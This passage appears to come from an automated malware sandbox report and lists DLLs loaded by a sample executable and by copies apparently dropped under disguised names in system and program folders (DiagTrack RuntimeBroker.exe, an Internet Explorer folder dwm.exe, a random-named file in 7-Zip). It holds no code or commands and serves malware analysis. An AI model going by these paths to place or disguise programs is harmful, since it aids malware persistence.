                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: dlnashext.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: wpdshext.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ktmw32.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: winmmbase.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: mmdevapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: devobj.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ksuser.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: avrt.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: audioses.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: powrprof.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: umpdc.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: msacm32.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: midimap.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: dwrite.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: windowscodecs.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: apphelp.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: sspicli.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: apphelp.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: version.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: wldp.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: profapi.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: sspicli.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: sspicli.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: version.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: wldp.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: profapi.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeSection loaded: sspicli.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe Section loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe Section loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe Section loaded: wldp.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe Section loaded: profapi.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe Section loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe Section loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe Section loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exe Section loaded: sspicli.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe Section loaded: mscoree.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe Section loaded: kernel.appcore.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe Section loaded: version.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe Section loaded: uxtheme.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe Section loaded: windows.storage.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe Section loaded: wldp.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe Section loaded: profapi.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe Section loaded: cryptsp.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe Section loaded: rsaenh.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe Section loaded: cryptbase.dll
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe Section loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Section loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Section loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Section loaded: version.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Section loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Section loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Section loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Section loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Section loaded: wldp.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Section loaded: profapi.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Section loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Section loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Section loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exe Section loaded: sspicli.dll
